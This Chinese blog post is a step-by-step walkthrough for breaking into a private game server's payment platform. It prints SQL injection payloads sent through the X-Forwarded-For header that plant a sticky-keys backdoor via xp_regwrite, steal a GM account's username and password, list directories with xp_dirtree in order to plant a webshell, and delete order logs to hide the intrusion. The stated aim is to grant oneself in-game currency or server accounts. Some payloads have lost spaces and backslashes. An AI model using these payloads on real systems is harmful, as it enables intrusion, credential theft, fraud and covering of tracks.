作者:admin发布时间:2022-01-14分类:zhaosf浏览:200评论:27
搜索关键字
由于时间关系我先找了一个站。
算了这个站没开3389也难得搞下去。站我已经找好了。。
就这个?gid==514
?gid=cq
检测权限
[][ODBCSQLServerDriver][SQLServer]将nvarchar值sa转换为数据类型为int的列时发生语法错误。呵呵不错。开了3389我们替换他的shift
X-Forwarded-For:11,1,1,1,1,1);execmaster..xp_regwriteHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsNTCurrentVersionImageFileExecutionOptionssethc.exe,debugger,REG_sz,c:windowssystem32cmd.exeon--
返回无错。。执行成功。接下来想干啥就干啥加账户进服务器。。或者查找平台上的gm账户密码给自己游戏里发元宝。。。。。
我下面也准备好了如果不是sa的情况下怎么继续入侵拿webshell.
X-Forwarded-For:11,1,1,1,1,1);updatemobile1setusercode=(selectusername+|+passwdfrommemberwhereid=543)wherenum=****22546319--
//num为自己下单的订单号,此处id为游戏平台gm账户id,
X-Forwarded-For:11,1,1,1,1,1);droptablefoofoofoo;createtablefoofoofoo([id][int]identity(1,1)notnull,[name][nvarchar](300)notnull,[depth][int]notnull,[isfile][nvarchar](50)null);--
第二步
X-Forwarded-For:11,1,1,1,1,1);declare@znvarchar(4000)set@z=0x65003A005C00insertfoofoofooexecutemaster..xp_dirtree@z,1,1--
//注意:0x63003a005c00=C:为sqlENCODE
第三步暴出总数
X-Forwarded-For:11,1,1,1,1,1);updatemobile1setusercode=(selectcast(count(*)asvarchar(8000))+char(94)fromfoofoofoo)wherenum=****22546319--
X-Forwarded-For:11,1,1,1,1,1);updatemobile1setusercode=(selecttop1cast([isfile]asnvarchar(4000))+char(94)+cast([name]asnvarchar(4000))from(selectdistincttop1*fromfoofoofooorderbyisfile,name)torderbyisfiledesc,namedesc)wherenum=****22546319--
修改distinct后面的数字,依次爆出。
一直爆找到站点目录然后备份木马到站点目录就可以拿到webshell时间关系我就不演示了。
byko高祖
附带删除下单日志
X-Forwarded-For:11,1,1,1,1,1);deletefrommobile1wherenumber=自己下单时候的账户--
标签:怎么找传奇私服服务器漏洞
已有27位网友发表了看法: